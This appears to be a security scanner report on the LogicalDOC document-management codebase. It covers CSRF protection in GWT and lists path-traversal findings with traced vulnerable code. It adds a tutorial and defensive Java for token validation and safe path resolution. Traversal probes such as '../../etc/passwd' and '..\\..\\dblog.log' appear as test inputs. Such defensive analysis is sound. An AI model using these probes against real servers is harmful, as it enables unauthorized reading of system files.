• Do not use GET requests for functions that change the state of the web application.

• For intranet applications, checking the HTTP Referer header may be enough: it shows whether the request came from the expected page. It is insufficient for Internet applications, because clients may reach the service through proxy servers, and they can strip the Referer header to increase privacy [2]. In addition, Open Redirect [3] vulnerabilities make protection based on checking the Referer header pointless.

• The GWT framework has a built-in mechanism against CSRF based on the Synchronizer Token Pattern [4]: a token is derived for each HTTP session, and a request is accepted as intentional only if it carries the token for the session it is sent under. To enable it, do the following [5]:

  • On the server side:

    • Add the XsrfTokenServiceServlet servlet to web.xml and tell it the name of the session cookie whose value the token is derived from:

<servlet>
    <servlet-name>xsrf</servlet-name>
    <servlet-class>
        com.google.gwt.user.server.rpc.XsrfTokenServiceServlet
    </servlet-class>
</servlet>
<servlet-mapping>
    <servlet-name>xsrf</servlet-name>
    <url-pattern>/gwt/xsrf</url-pattern>
</servlet-mapping>
...
<context-param>
    <param-name>gwt.xsrf.session_cookie_name</param-name>
    <param-value>JSESSIONID</param-value>
</context-param>

    • RPC servlets that need to be protected must inherit from the XsrfProtectedServiceServlet class:

package com.example.foo.server;

import com.google.gwt.user.server.rpc.XsrfProtectedServiceServlet;
import com.example.foo.client.MyService;

public class MyServiceImpl extends XsrfProtectedServiceServlet implements MyService {

    public String myMethod(String s) {
        // Do something interesting with 's' here on the server.
        return s;
    }
}

  • On the client side:

    • RPC interfaces must inherit from the XsrfProtectedService interface:

package com.example.foo.client;

import com.google.gwt.user.client.rpc.XsrfProtectedService;

public interface MyService extends XsrfProtectedService {
    public String myMethod(String s);
}

    • Or be marked with the @XsrfProtect annotation:

package com.example.foo.client;

import com.google.gwt.user.client.rpc.RemoteService;
import com.google.gwt.user.client.rpc.XsrfProtect;

@XsrfProtect
public interface MyService extends RemoteService {
    public String myMethod(String s);
}

    • When calling the protected service, the client must first obtain the token and send it along with the call. To do that, request a token from XsrfTokenService and attach it to the service proxy through the HasRpcToken interface:

XsrfTokenServiceAsync xsrf = (XsrfTokenServiceAsync) GWT.create(XsrfTokenService.class);
((ServiceDefTarget) xsrf).setServiceEntryPoint(GWT.getModuleBaseURL() + "xsrf");
xsrf.getNewXsrfToken(new AsyncCallback<XsrfToken>() {
    public void onSuccess(XsrfToken token) {
        MyServiceAsync rpc = (MyServiceAsync) GWT.create(MyService.class);
        ((HasRpcToken) rpc).setRpcToken(token);

        // make XSRF protected RPC call
        rpc.myMethod("hello", new AsyncCallback<String>() {
            public void onSuccess(String result) {
                // ...
            }

            public void onFailure(Throwable caught) {
                // ...
            }
        });
    }

    public void onFailure(Throwable caught) {
        try {
            throw caught;
        } catch (RpcTokenException e) {
            // Can be thrown for several reasons:
            //   - duplicate session cookie, which may be a sign of a cookie
            //     overwrite attack
            //   - XSRF token cannot be generated because session cookie isn't
            //     present
        } catch (Throwable e) {
            // unexpected
        }
    }
});
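The check that the XsrfProtectedServiceServlet steps above put in front of every RPC method is worth seeing on its own, because it is exactly what the services listed in this finding lack: they extend RemoteServiceServlet, so a forged request that carries the victim's session cookie is all an attacker needs. The class below is an added illustration of the Synchronizer Token Pattern, not GWT's or LogicalDOC's code. GWT's servlet derives its token from the session cookie value; deriving it here as an HMAC over that value with a server-side key is an assumption of this example, as are the cookie values in main.

```java
import java.nio.charset.StandardCharsets;
import java.security.GeneralSecurityException;
import java.security.MessageDigest;
import java.security.SecureRandom;
import java.util.Base64;
import javax.crypto.Mac;
import javax.crypto.spec.SecretKeySpec;

/**
 * Session-bound synchronizer token. Added illustration, not GWT or LogicalDOC
 * code: the HMAC-with-server-key derivation is this example's assumption.
 */
public class SessionBoundXsrfToken {

    private final byte[] key;   // server-side secret; never sent to the browser

    public SessionBoundXsrfToken(byte[] key) {
        this.key = key.clone();
    }

    /** Issue the token for a session. Only same-origin script can fetch it, so a cross-site form cannot. */
    public String issue(String sessionCookieValue) {
        if (sessionCookieValue == null || sessionCookieValue.isEmpty())
            throw new IllegalStateException("no session cookie: nothing to bind the token to");
        return Base64.getUrlEncoder().withoutPadding().encodeToString(hmac(sessionCookieValue));
    }

    /** Accept only a token that was minted for the very session the request is sent under. */
    public boolean validate(String sessionCookieValue, String presentedToken) {
        if (sessionCookieValue == null || sessionCookieValue.isEmpty() || presentedToken == null)
            return false;
        byte[] presented;
        try {
            presented = Base64.getUrlDecoder().decode(presentedToken);
        } catch (IllegalArgumentException e) {
            return false;               // not even well-formed
        }
        return MessageDigest.isEqual(hmac(sessionCookieValue), presented);  // constant-time compare
    }

    private byte[] hmac(String data) {
        try {
            Mac mac = Mac.getInstance("HmacSHA256");
            mac.init(new SecretKeySpec(key, "HmacSHA256"));
            return mac.doFinal(data.getBytes(StandardCharsets.UTF_8));
        } catch (GeneralSecurityException e) {
            throw new IllegalStateException(e);
        }
    }

    public static void main(String[] args) {
        byte[] key = new byte[32];
        new SecureRandom().nextBytes(key);
        SessionBoundXsrfToken tokens = new SessionBoundXsrfToken(key);

        // Constructed cookie values standing in for two JSESSIONIDs
        String victimSession = "9C4F0A7E1B3D";
        String attackerSession = "5A1E7C2B8D0F";

        String victimToken = tokens.issue(victimSession);

        // 1. Legitimate GWT-RPC call: victim's cookie plus the token the page fetched over XHR
        System.out.println("legitimate call accepted: " + tokens.validate(victimSession, victimToken));
        // 2. Forged form on the attacker's page: the browser attaches the victim's cookie, but no token
        System.out.println("forged call without token rejected: " + !tokens.validate(victimSession, null));
        // 3. The attacker knows a token (their own session's) and pastes it into the forged request
        System.out.println("token from another session rejected: " + !tokens.validate(victimSession, tokens.issue(attackerSession)));
        // 4. Tampered token
        System.out.println("tampered token rejected: " + !tokens.validate(victimSession, victimToken.substring(1)));
    }
}
```

The third case is the one that matters for a multi-user application such as the scanned one: an attacker who is also a legitimate user can obtain a perfectly valid token for their own session, so the token must be bound to the session cookie rather than merely be "a valid token". The constant-time comparison keeps the check from leaking the expected value byte by byte.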

Java: File system path manipulation
Severity: high
Language: Java
Short description: Relative paths in a file system are commonly written with the "./" and "../" components (with backslashes on Windows), which denote the current and the parent directory respectively. If the application builds paths to the files it needs from external data, an attacker can take advantage of it when that input is not filtered properly: the attacker can read or write local files on the application server that the developer never intended to expose.
Full description: https://localhost:443/scanner/article?articleName=/en/Java/InjectionPath.html
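In the attack trace of this finding the user-controlled name is appended to a per-user directory (new File(dir, name + ".ser")) and the resulting file is handed to ObjectInputStream.readObject(), so whoever controls the path also chooses which file gets deserialized. The class below is an added example of how such a name should be resolved; it is not LogicalDOC code, and the allow-list pattern, the directory layout and the sample names are assumptions of the example.

```java
import java.io.File;
import java.io.IOException;
import java.util.regex.Pattern;

/**
 * Resolving a user-supplied saved-query name to a file without letting it
 * leave the user's "queries" directory. Added illustration, not LogicalDOC
 * code; the allow-list pattern and the directory layout are assumptions.
 */
public class SafeQueryFile {

    // Assumed allow-list for a query name: short, alphanumeric plus '-' and '_'.
    // No '.', '/', '\\' or NUL, so "../" and "x.ser\0" can never get through.
    private static final Pattern SAFE_NAME = Pattern.compile("[A-Za-z0-9_-]{1,64}");

    /**
     * Returns dir/<name>.ser, or throws if the name fails the allow-list or the
     * canonical result is not a direct child of the canonical directory.
     */
    public static File resolveQueryFile(File dir, String name) throws IOException {
        if (name == null || !SAFE_NAME.matcher(name).matches())
            throw new IllegalArgumentException("invalid query name");

        // Canonical paths resolve ".", ".." and symlinks; compare after that, not before.
        File base = dir.getCanonicalFile();
        File target = new File(base, name + ".ser").getCanonicalFile();

        // A direct-child test is stricter than startsWith(base.getPath()), which
        // would also accept a sibling directory such as .../queries-old/.
        if (!base.equals(target.getParentFile()))
            throw new IOException("query file outside the user's queries directory");
        return target;
    }

    public static void main(String[] args) throws IOException {
        File dir = new File(System.getProperty("java.io.tmpdir"), "queries-demo");
        if (!dir.isDirectory() && !dir.mkdirs())
            throw new IOException("cannot create " + dir);

        // Constructed inputs: one legitimate name and three traversal attempts
        String[] names = { "monthly_report", "../../../../etc/passwd", "..\\..\\windows\\win.ini", "a/b" };
        for (String n : names) {
            try {
                System.out.println(n + " -> " + resolveQueryFile(dir, n));
            } catch (IllegalArgumentException | IOException e) {
                System.out.println(n + " -> rejected (" + e.getMessage() + ")");
            }
        }
    }
}
```

The two checks are deliberately redundant: the allow-list is what should reject bad input in practice, and the canonical-path containment test is the backstop for the day someone relaxes the pattern. Only the first of the four sample names resolves; the others are rejected before any file is opened.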

Found Vulnerabilities:
File name: logicaldoc/logicaldoc-core/src/main/java/com/logicaldoc/core/searchengine/SearchOptions.java
Code:

101    }
102
103    public static SearchOptions read(File file) throws FileNotFoundException, IOException, ClassNotFoundException {
104        SearchOptions searchOptions = null;
105        // Deserialize from a file
106        ObjectInputStream in = new ObjectInputStream(new FileInputStream(file));
107        try {
108            // Deserialize the object
109            searchOptions = (SearchOptions) in.readObject();
110        } finally {
111            in.close();

Attack details:

logicaldoc/logicaldoc-webapp/src/main/java/com/logicaldoc/web/service/SearchServiceImpl.java

com.logicaldoc.web.service.SearchServiceImpl::load
186            File dir = UserUtil.getUserResource(session.getUserId(), "queries");
187            File file = new File(dir, name + ".ser");
188            SearchOptions opt = null;

logicaldoc/logicaldoc-webapp/src/main/java/com/logicaldoc/web/service/SearchServiceImpl.java

com.logicaldoc.web.service.SearchServiceImpl::load
189            try {
190                opt = SearchOptions.read(file);
191            } catch (Exception e) {

logicaldoc/logicaldoc-core/src/main/java/com/logicaldoc/core/searchengine/SearchOptions.java

com.logicaldoc.core.searchengine.SearchOptions::read
105        // Deserialize from a file
106        ObjectInputStream in = new ObjectInputStream(new FileInputStream(file));
107        try {

File name: logicaldoc/logicaldoc-core/src/main/java/com/logicaldoc/core/util/UserUtil.java
Code:

22     * @param id The user identifier
23     * @return
24     */
25    public static File getUserHome(long id) {
26        File root = getUsersDir();
27        File userDir = new File(root, Long.toString(id));
28        if (!userDir.exists()) {
29            try {
30                FileUtils.forceMkdir(userDir);
31            } catch (IOException e) {
32                return null;

Attack details:

logicaldoc/logicaldoc-webapp/src/main/java/com/logicaldoc/web/service/SearchServiceImpl.java

com.logicaldoc.web.service.SearchServiceImpl::getSearches
206    public List<SearchOptions> getSearches(Session session) {
207        File file = UserUtil.getUserResource(session.getUserId(), "queries");
208        if (!file.exists()) {

logicaldoc/logicaldoc-core/src/main/java/com/logicaldoc/core/util/UserUtil.java

com.logicaldoc.core.util.UserUtil::getUserResource
47    public static File getUserResource(long id, String path) {
48        File root = getUserHome(id);
49        File resource = new File(root.getPath() + "/" + path);

logicaldoc/logicaldoc-core/src/main/java/com/logicaldoc/core/util/UserUtil.java

com.logicaldoc.core.util.UserUtil::getUserHome
26        File root = getUsersDir();
27        File userDir = new File(root, Long.toString(id));
28        if (!userDir.exists()) {

File name: logicaldoc/logicaldoc-dropbox/src/main/java/com/logicaldoc/dropbox/Dropbox.java
Code:

150        }
151        return false;
152    }
153
154    public boolean uploadFile(File inputFile, String path, boolean overwrite) throws IOException {
155        FileInputStream inputStream = new FileInputStream(inputFile);
156        try {
157            if (!path.startsWith("/"))
158                path = "/" + path;
159            DbxWriteMode mode = overwrite ? DbxWriteMode.force() : DbxWriteMode.add();
160            DbxEntry.File uploadedFile = client.uploadFile(path, mode, inputFile.length(), inputStream);

Attack details:

logicaldoc/logicaldoc-dropbox/src/main/java/com/logicaldoc/dropbox/DropboxServiceImpl.java

com.logicaldoc.dropbox.DropboxServiceImpl::uploadDocument
195            store.writeToFile(docId, store.getResourceName(docId, null, null), temp);
196            dropbox.uploadFile(temp, path, true);
197

logicaldoc/logicaldoc-dropbox/src/main/java/com/logicaldoc/dropbox/Dropbox.java

com.logicaldoc.dropbox.Dropbox::uploadFile
154    public boolean uploadFile(File inputFile, String path, boolean overwrite) throws IOException {
155        FileInputStream inputStream = new FileInputStream(inputFile);
156        try {

File name: logicaldoc/logicaldoc-util/src/main/java/com/logicaldoc/util/csv/CSVFileReader.java
Code:

71     * @throws UnsupportedEncodingException
72     */
73    public CSVFileReader(String inputFileName, char sep, char qual) throws FileNotFoundException,
74            UnsupportedEncodingException {
75        super(sep, qual);
76        InputStreamReader isr = new InputStreamReader(new FileInputStream(inputFileName), "UTF-8");
77        in = new BufferedReader(isr);
78    }
79
80    /**
81     * Split the next line of the input CSV file into fields.

Attack details:

logicaldoc/logicaldoc-webapp/src/main/java/com/logicaldoc/web/service/ContactServiceImpl.java

com.logicaldoc.web.service.ContactServiceImpl::parseContacts
124            if (file != null) {
125                CSVFileReader reader = new CSVFileReader(file.getAbsolutePath(), separator.charAt(0),
126                        delimiter.charAt(0));
127                if (skipFirstRow)

logicaldoc/logicaldoc-util/src/main/java/com/logicaldoc/util/csv/CSVFileReader.java

com.logicaldoc.util.csv.CSVFileReader::Constructor
75        super(sep, qual);
76        InputStreamReader isr = new InputStreamReader(new FileInputStream(inputFileName), "UTF-8");
77        in = new BufferedReader(isr);


File name: logicaldoc/logicaldoc-util/src/main/java/com/logicaldoc/util/plugin/PluginRegistry.java
Code:

263     *
264     * @param pluginName The plugin name
265     */
266    public static File getPluginHome(String pluginName) {
267        File root = getPluginsDir();
268        File userDir = new File(root, pluginName);
269        if (!userDir.exists()) {
270            try {
271                FileUtils.forceMkdir(userDir);
272            } catch (IOException e) {
273                return null;

Attack details:

logicaldoc/logicaldoc-webapp/src/main/java/com/logicaldoc/web/DownloadServlet.java

com.logicaldoc.web.DownloadServlet::doGet
66            if (request.getParameter("pluginId") != null)
67                ServletUtil.downloadPluginResource(request, response, sid, request.getParameter("pluginId"),
68                        request.getParameter("resourcePath"), request.getParameter("fileName"));
69            else

logicaldoc/logicaldoc-webapp/src/main/java/com/logicaldoc/web/util/ServletUtil.java

com.logicaldoc.web.util.ServletUtil::downloadPluginResource
109
110        File file = PluginRegistry.getPluginResource(pluginName, resourcePath);
111

logicaldoc/logicaldoc-util/src/main/java/com/logicaldoc/util/plugin/PluginRegistry.java

com.logicaldoc.util.plugin.PluginRegistry::getPluginResource
308    public static File getPluginResource(String pluginName, String path) {
309        File root = getPluginHome(pluginName);
310        File resource = new File(root.getPath() + "/" + path);

logicaldoc/logicaldoc-util/src/main/java/com/logicaldoc/util/plugin/PluginRegistry.java

com.logicaldoc.util.plugin.PluginRegistry::getPluginHome
267        File root = getPluginsDir();
268        File userDir = new File(root, pluginName);
269        if (!userDir.exists()) {

File name: logicaldoc/logicaldoc-util/src/main/java/com/logicaldoc/util/plugin/PluginRegistry.java
Code:

305     * @param path The resource path
306     * @return
307     */
308    public static File getPluginResource(String pluginName, String path) {
309        File root = getPluginHome(pluginName);
310        File resource = new File(root.getPath() + "/" + path);
311        if (!resource.exists() && !path.contains("."))
312            try {
313                FileUtils.forceMkdir(resource);
314            } catch (IOException e) {
315                return null;

Attack details:


logicaldoc/logicaldoc-webapp/src/main/java/com/logicaldoc/web/DownloadServlet.java

com.logicaldoc.web.DownloadServlet::doGet
66            if (request.getParameter("pluginId") != null)
67                ServletUtil.downloadPluginResource(request, response, sid, request.getParameter("pluginId"),
68                        request.getParameter("resourcePath"), request.getParameter("fileName"));
69            else

logicaldoc/logicaldoc-webapp/src/main/java/com/logicaldoc/web/util/ServletUtil.java

com.logicaldoc.web.util.ServletUtil::downloadPluginResource
109
110        File file = PluginRegistry.getPluginResource(pluginName, resourcePath);
111

logicaldoc/logicaldoc-util/src/main/java/com/logicaldoc/util/plugin/PluginRegistry.java

com.logicaldoc.util.plugin.PluginRegistry::getPluginResource
308    public static File getPluginResource(String pluginName, String path) {
309        File root = getPluginHome(pluginName);
310        File resource = new File(root.getPath() + "/" + path);

logicaldoc/logicaldoc-util/src/main/java/com/logicaldoc/util/plugin/PluginRegistry.java

com.logicaldoc.util.plugin.PluginRegistry::getPluginHome
267        File root = getPluginsDir();
268        File userDir = new File(root, pluginName);
269        if (!userDir.exists()) {

logicaldoc/logicaldoc-util/src/main/java/com/logicaldoc/util/plugin/PluginRegistry.java

com.logicaldoc.util.plugin.PluginRegistry::getPluginHome
275        }
276        return userDir;
277    }
278

logicaldoc/logicaldoc-util/src/main/java/com/logicaldoc/util/plugin/PluginRegistry.java

com.logicaldoc.util.plugin.PluginRegistry::getPluginResource
308    public static File getPluginResource(String pluginName, String path) {
309        File root = getPluginHome(pluginName);
310        File resource = new File(root.getPath() + "/" + path);

logicaldoc/logicaldoc-util/src/main/java/com/logicaldoc/util/plugin/PluginRegistry.java

com.logicaldoc.util.plugin.PluginRegistry::getPluginResource
309        File root = getPluginHome(pluginName);
310        File resource = new File(root.getPath() + "/" + path);
311        if (!resource.exists() && !path.contains("."))

File name: logicaldoc/logicaldoc-webapp/src/main/java/com/logicaldoc/web/UploadServlet.java
Code:

233                    Map<String, String> receivedContentTypes = (Map<String, String>) session
234                            .getAttribute(RECEIVEDCONTENTTYPES);
235
236                    if (receivedContentTypes != null && receivedContentTypes.containsKey(fieldName))
237                        response.setContentType(receivedContentTypes.get(fieldName));
238                    FileInputStream is = new FileInputStream(f);
239                    copyFromInputStreamToOutputStream(is, response.getOutputStream());
240                } else {
241                    renderXmlResponse(request, response, XML_ERROR_ITEM_NOT_FOUND);
242                }
243            }

Attack details:

logicaldoc/logicaldoc-webapp/src/main/java/com/logicaldoc/web/UploadServlet.java

com.logicaldoc.web.UploadServlet::getUploadedFile
216
217        String fieldName = request.getParameter(UConsts.PARAM_SHOW);
218

logicaldoc/logicaldoc-webapp/src/main/java/com/logicaldoc/web/UploadServlet.java

com.logicaldoc.web.UploadServlet::getUploadedFile
227
228                if (receivedFiles == null || !receivedFiles.containsKey(fieldName))
229                    return;

logicaldoc/logicaldoc-webapp/src/main/java/com/logicaldoc/web/UploadServlet.java

com.logicaldoc.web.UploadServlet::getUploadedFile
230
231                File f = receivedFiles.get(fieldName);
232                if (f != null) {

logicaldoc/logicaldoc-webapp/src/main/java/com/logicaldoc/web/UploadServlet.java

com.logicaldoc.web.UploadServlet::getUploadedFile
237                        response.setContentType(receivedContentTypes.get(fieldName));
238                    FileInputStream is = new FileInputStream(f);
239                    copyFromInputStreamToOutputStream(is, response.getOutputStream());

File name: logicaldoc/logicaldoc-webapp/src/main/java/com/logicaldoc/web/service/SearchServiceImpl.java
Code:

138
139        try {
140            SearchOptions opt = toSearchOptions(options);
141
142            File file = UserUtil.getUserResource(session.getUserId(), "queries");
143            file = new File(file, opt.getName() + ".ser");
144            if (file.exists()) {
145                return false;
146            }
147
148            try {

Attack details:

logicaldoc/logicaldoc-webapp/src/main/java/com/logicaldoc/web/service/SearchServiceImpl.java

com.logicaldoc.web.service.SearchServiceImpl::toSearchOptions
291        searchOptions.setMaxHits(options.getMaxHits());
292        searchOptions.setName(options.getName());
293        searchOptions.setUserId(options.getUserId());

logicaldoc/logicaldoc-core/src/main/java/com/logicaldoc/core/searchengine/SearchOptions.java

com.logicaldoc.core.searchengine.SearchOptions::setName
131    public void setName(String name) {
132        this.name = name;
133    }

logicaldoc/logicaldoc-core/src/main/java/com/logicaldoc/core/searchengine/SearchOptions.java

com.logicaldoc.core.searchengine.SearchOptions::getName
127    public String getName() {
128        return name;
129    }
130

logicaldoc/logicaldoc-webapp/src/main/java/com/logicaldoc/web/service/SearchServiceImpl.java

com.logicaldoc.web.service.SearchServiceImpl::save
142            File file = UserUtil.getUserResource(session.getUserId(), "queries");
143            file = new File(file, opt.getName() + ".ser");
144            if (file.exists()) {

File name: logicaldoc/logicaldoc-webapp/src/main/java/com/logicaldoc/web/service/SearchServiceImpl.java
Code:

164
165        try {
166            File dir = UserUtil.getUserResource(session.getUserId(), "queries");
167
168            for (String name : names) {
169                File file = new File(dir, name + ".ser");
170                try {
171                    FileUtils.forceDelete(file);
172                } catch (IOException e) {
173                    log.error(e.getMessage());
174                }

Attack details:

logicaldoc/logicaldoc-webapp/src/main/java/com/logicaldoc/web/service/SearchServiceImpl.java

com.logicaldoc.web.service.SearchServiceImpl::delete
167
168            for (String name : names) {
169                File file = new File(dir, name + ".ser");

logicaldoc/logicaldoc-webapp/src/main/java/com/logicaldoc/web/service/SearchServiceImpl.java

com.logicaldoc.web.service.SearchServiceImpl::delete
168            for (String name : names) {
169                File file = new File(dir, name + ".ser");
170                try {

File name: logicaldoc/logicaldoc-webapp/src/main/java/com/logicaldoc/web/service/SearchServiceImpl.java
Code:

182    public GUISearchOptions load(String name) throws ServerException {
183        Session session = ServiceUtil.validateSession(getThreadLocalRequest());
184
185        try {
186            File dir = UserUtil.getUserResource(session.getUserId(), "queries");
187            File file = new File(dir, name + ".ser");
188            SearchOptions opt = null;
189            try {
190                opt = SearchOptions.read(file);
191            } catch (Exception e) {
192                log.error(e.getMessage(), e);

File name: logicaldoc/logicaldoc-webapp/src/main/java/com/logicaldoc/web/service/SetupServiceImpl.java
Code:

149
150    public void makeWorkingDir(File repoFolder) throws IOException {
151        repoFolder.mkdirs();
152        repoFolder.mkdir();
153
154        File dbDir = new File(repoFolder, "db");
155        FileUtils.forceMkdir(dbDir);
156
157        // build phisically the working directory
158        // and change settings config
159        String docDir = FilenameUtils.separatorsToUnix(repoFolder.getPath() + "/docs/");

File name: logicaldoc/logicaldoc-webapp/src/main/java/com/logicaldoc/web/service/SetupServiceImpl.java
Code:

37    protected static Logger log = LoggerFactory.getLogger(SetupServiceImpl.class);
38
39    @Override
40    public void setup(SetupInfo data) {
41        data.setRepositoryFolder(data.getRepositoryFolder().replaceAll("\\\\", "/"));
42        File repoFolder = new File(data.getRepositoryFolder());
43        log.warn("Initialize system using repository " + repoFolder);
44        try {
45            makeWorkingDir(repoFolder);
46            createDB(data);
47            writeRegConfig(data);

File name: logicaldoc/logicaldoc-webapp/src/main/java/com/logicaldoc/web/util/ServletUtil.java
Code:

121
122        InputStream is = null;
123        OutputStream os = null;
124
125        try {
126            is = new FileInputStream(file);
127            os = response.getOutputStream();
128
129            int letter = 0;
130
131            byte[] buffer = new byte[128 * 1024];

Attack details:

logicaldoc/logicaldoc-webapp/src/main/java/com/logicaldoc/web/DownloadServlet.java

com.logicaldoc.web.DownloadServlet::doGet
66            if (request.getParameter("pluginId") != null)
67                ServletUtil.downloadPluginResource(request, response, sid, request.getParameter("pluginId"),
68                        request.getParameter("resourcePath"), request.getParameter("fileName"));
69            else

logicaldoc/logicaldoc-webapp/src/main/java/com/logicaldoc/web/util/ServletUtil.java

com.logicaldoc.web.util.ServletUtil::downloadPluginResource
109
110        File file = PluginRegistry.getPluginResource(pluginName, resourcePath);
111

logicaldoc/logicaldoc-util/src/main/java/com/logicaldoc/util/plugin/PluginRegistry.java

com.logicaldoc.util.plugin.PluginRegistry::getPluginResource
308    public static File getPluginResource(String pluginName, String path) {
309        File root = getPluginHome(pluginName);
310        File resource = new File(root.getPath() + "/" + path);

logicaldoc/logicaldoc-util/src/main/java/com/logicaldoc/util/plugin/PluginRegistry.java

com.logicaldoc.util.plugin.PluginRegistry::getPluginHome
267        File root = getPluginsDir();
268        File userDir = new File(root, pluginName);
269        if (!userDir.exists()) {

logicaldoc/logicaldoc-util/src/main/java/com/logicaldoc/util/plugin/PluginRegistry.java

com.logicaldoc.util.plugin.PluginRegistry::getPluginHome
275        }
276        return userDir;
277    }
278

logicaldoc/logicaldoc-util/src/main/java/com/logicaldoc/util/plugin/PluginRegistry.java

com.logicaldoc.util.plugin.PluginRegistry::getPluginResource
308    public static File getPluginResource(String pluginName, String path) {
309        File root = getPluginHome(pluginName);
310        File resource = new File(root.getPath() + "/" + path);

logicaldoc/logicaldoc-util/src/main/java/com/logicaldoc/util/plugin/PluginRegistry.java

com.logicaldoc.util.plugin.PluginRegistry::getPluginResource
309        File root = getPluginHome(pluginName);
310        File resource = new File(root.getPath() + "/" + path);
311        if (!resource.exists() && !path.contains("."))

logicaldoc/logicaldoc-util/src/main/java/com/logicaldoc/util/plugin/PluginRegistry.java

com.logicaldoc.util.plugin.PluginRegistry::getPluginResource
317
318        return resource;
319    }
320}

logicaldoc/logicaldoc-webapp/src/main/java/com/logicaldoc/web/util/ServletUtil.java

com.logicaldoc.web.util.ServletUtil::downloadPluginResource
109
110        File file = PluginRegistry.getPluginResource(pluginName, resourcePath);
111

logicaldoc/logicaldoc-webapp/src/main/java/com/logicaldoc/web/util/ServletUtil.java

com.logicaldoc.web.util.ServletUtil::downloadPluginResource
125        try {
126            is = new FileInputStream(file);
127            os = response.getOutputStream();

File system path manipulation

Relative paths in a file system are commonly written with the "./" and "../" sequences (with backslashes on Windows), which denote the current and the parent directory respectively. If the application builds paths to the files it needs from external data and does not filter that input properly, a malicious user can take advantage of it and read or write files on the application server that the developer never intended to expose.

Example 1

This vulnerability shows up when both of the following are true:

• The malicious user can control the path of a file system object that is about to be accessed;

• Having supplied that path, the malicious user can perform operations that were previously denied to him.

Let's take a look at an example where the application receives a file name from an HTTP request, checks that the file exists on the server, and returns the file to the user in an HTTP response:

Java
@Override
protected void doGet(HttpServletRequest request, HttpServletResponse response)
            throws ServletException, IOException {
    String requestedFileName = request.getParameter("file");
    File file = new File("/usr/local/fileserver/" + requestedFileName);
    if (send404IfNotExists(response, file))
        return;
    sendFile(response, file);
}

Let's suppose the HTML page that offers the download presents a list of available files, so that the user's choice appears to be limited to those files. However, a malicious user can build the URL in the browser address bar himself and supply the path to whatever file he wants. In this way he gains access to server files that were never meant to be public.

Example 2

Let’s take a look at a similar example:

Java
@Override
protected void doGet(HttpServletRequest request, HttpServletResponse response)
            throws ServletException, IOException {
    String requestedFileName = request.getParameter("file");
    File file = new File("C:\\reports\\users\\" + requestedFileName);
    if (send404IfNotExists(response, file))
        return;
    sendFile(response, file);
}

The developer has not anticipated that the malicious user can pass the following as the file name:

Data
"..\\..\\dblog.log"


As a result, the program will return the following file:

Data
"C:\reports\users\..\..\dblog.log"

Which is identical to:

Data
"C:\dblog.log"

Instead of a report from the users directory, the malicious user thus reads the database operations log, which contains sensitive information.

Potential consequences

• The malicious user can gain unauthorised access to confidential data stored on the file system;

• The malicious user can gain write access to critical files, including configuration files. For example, he can add a new user account and bypass authorisation;

• The malicious user can gain write access to executable files and libraries, replacing a critical application module with his own and thereby gaining complete control of the system;

• The malicious user can gain delete access to critical files, rendering the system unusable.

Removal recommendations

• When input is filtered on the client side, make sure that the same filtering is performed on the server side as well, because the user can modify the data after the client-side filtering has run;

• Assume that all data coming from the client is a potential threat, including hidden form fields and cookies. We recommend the "accept known good" approach to input filtering: a whitelist that describes the acceptable input format, with every input that does not match it rejected. For example, you can limit the permitted file extensions, the characters allowed in the input string, or the length of the file name in characters;

• Canonicalise file system paths before validating them;

• To ensure the validity of file system paths, you can use a list of allowed characters, for example by requiring that the file name contain at most a single '.' and no '/' at all. We recommend against relying on blacklists of potentially dangerous characters, including filters that strip dangerous sequences from the string: if such a filter removes '../' from its input, then filtering the sequence '....//' yields '../', exactly what the malicious user needs. Using these recommendations, the first example can be rewritten with a validateFilename function:

Java
@Override
protected void doGet(HttpServletRequest request, HttpServletResponse response)
            throws ServletException, IOException {
    String requestedFileName = request.getParameter("file");
    File file = new File("/usr/local/fileserver/" + validateFilename(requestedFileName));
    if (send404IfNotExists(response, file))
        return;
    sendFile(response, file);
}
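The rewritten example leaves validateFilename undefined. The following is an added example, not LogicalDOC code: one way to implement that function as a strict allow-list, plus a canonicalisation-and-containment check (resolveUnderBase) for callers that must accept a sub-path rather than a bare name, as the pluginId/resourcePath parameters in the findings above do. The class name, the method name resolveUnderBase, and the base directory and probe strings in main() are assumptions.

```java
// Added example, not LogicalDOC code. Requires only the JDK.
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.regex.Pattern;

public final class SafePaths {

    // Allow-list ("accept known good"): letters, digits, '_' and '-', at most one
    // '.' for the extension, bounded length. '/', '\' and ".." cannot match at all,
    // so no "../" sequence survives, whatever the operating system.
    private static final Pattern SAFE_NAME =
            Pattern.compile("[A-Za-z0-9_-]{1,64}(\\.[A-Za-z0-9]{1,8})?");

    /** Returns the name unchanged if it is a plain file name, otherwise throws. */
    public static String validateFilename(String name) {
        if (name == null || !SAFE_NAME.matcher(name).matches())
            throw new IllegalArgumentException("rejected file name");
        return name;
    }

    /**
     * For inputs that may legitimately contain sub-directories: join, canonicalise,
     * and confirm the result is still inside base. Rejects absolute inputs, "../"
     * climbs, the base directory itself and (for existing files) symlinks that
     * point outside base.
     */
    public static Path resolveUnderBase(Path base, String untrusted) throws IOException {
        if (untrusted == null || untrusted.indexOf('\0') >= 0)
            throw new IllegalArgumentException("rejected path");
        Path root = base.toAbsolutePath().normalize();
        // resolve() returns the argument itself when it is absolute, so "/etc/passwd"
        // ends up outside root and fails the containment check below.
        Path candidate = root.resolve(untrusted).normalize();
        // Path.startsWith compares whole path elements: "/data/docs" does not start
        // with "/data/doc", which a plain String.startsWith check would get wrong.
        if (candidate.equals(root) || !candidate.startsWith(root))
            throw new IllegalArgumentException("path escapes base directory");
        if (Files.exists(candidate)) {
            // Follow symlinks and re-check. This is a check-then-use window, so the
            // caller should open the returned 'real' path, not a recomputed one.
            Path real = candidate.toRealPath();
            if (!real.startsWith(root.toRealPath()))
                throw new IllegalArgumentException("symlink escapes base directory");
            return real;
        }
        return candidate;
    }

    public static void main(String[] args) throws IOException {
        Path base = Paths.get("/usr/local/fileserver");      // assumed base directory
        String[] probes = {                                   // constructed inputs
            "report.pdf", "..\\..\\dblog.log", "../../etc/passwd", "....//....//etc/passwd",
            "/etc/passwd", "sub/dir/report.pdf", "", "a.b.c"
        };
        for (String p : probes) {
            String byName;
            try { byName = "ok:" + validateFilename(p); }
            catch (IllegalArgumentException e) { byName = "rejected"; }
            String byPath;
            try { byPath = "ok:" + resolveUnderBase(base, p); }
            catch (IllegalArgumentException e) { byPath = "rejected"; }
            System.out.printf("%-28s name=%-16s path=%s%n", '"' + p + '"', byName, byPath);
        }
    }
}
```

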